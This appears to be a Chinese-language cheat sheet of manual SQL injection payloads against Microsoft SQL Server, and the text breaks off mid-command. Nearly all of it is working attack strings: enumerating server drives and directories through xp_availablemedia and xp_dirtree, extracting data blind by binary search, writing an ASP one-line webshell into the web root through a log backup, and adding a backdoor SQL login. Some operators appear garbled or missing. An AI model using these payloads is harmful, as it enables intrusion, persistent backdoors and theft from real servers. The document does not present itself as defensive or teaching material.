SQL手工注入方法(SQL Server2005).docVIP

SQL手工注入方法(SQL Server2005) 建表p(i为自动编号,a记录盘符类似c:\,b记录可用字节,其它省略) URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));-- URL;insert p exec xp_availablemedia;--列出所有驱动器并插入表p URL;and (select count(*) from p)3;--折半法查出驱动器总数 URL;and ascii(substring((select a from p where i=1),1,1))=67;--折半法查出驱动器名(注asc(c)=67) --上面一般用于无显错情况下使用-------以此类推,得到所有驱动器名 URL;and (select a from p where i=1)3;--报错得到第一个驱动器名 --上面一般用于显错情况下使用-------以此类推,得到所有驱动器名 URL;;drop table p;--删除表p --(2) ******查看目录方法****** URL;create table pa(m nvarchar(255),i nvarchar(255));--建表pa(m记录目录,i记录深度) URL;insert pa exec xp_dirtree ’e:’;--列出驱动器e并插入表pa URL;and (select count(*) from pa where i0)-1;--折半法查出i深度 URL;and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))0;--报错得到深度i=1的第一个目录名 --上面一般用显错且目录名不为数字情况下使用-------(得到第二个目录把top 0换为top 1,换深度只换i就行)以此类推,得到e盘的所有目录 URL;and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))0;--折半法查出深度i=1的第一个目录名的长度 URL;and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))0;--折半法查出深度i=1的第一个目录名的第一个字符长度 --上面一般用无显错情况下使用-------(得到第二个目录把top 0换为top 1,换深度只换i就行)以此类推,得到e盘的所有目录 URL;drop table pa;--删除表pa ----------------------------经过上面的方法就可得到服务器所有目录(这里为连接用户有读取权限目录)----------------- --(3) 数据库备份到Web目录(先拿个WebShell再说吧 注:此为SQL Server2000) URL;alter database employ_ set RECOVERY FULL;--把当前库L设置成日志完全恢复模式 URL;URL;create table s(l image);--建表s URL;backup log s to disk = ’c:cmd’ with init;--减少备分数据的大小 URL;URL;insert s values(’%execute(request(a))%’)--在表s中插入一句话马 URL;backup log hh to disk = ’e:\web\g.asp’;--备分日志到WEB路径 URL;drop table s;--删除表s URL;alter database hh set RECOVERY SIMPLE;--把SQL设置成日志简单恢复模式 --------------------------------------OK到此WebShell应该到手了----------------------------------------------- --(4) 以下为一些注入杂项 ----SA权限: URL;exec aster.dbo.sp_addlogin hacker;--添加SQL用户 URL;exec master.dbo.sp_password null,hacker,hacker;-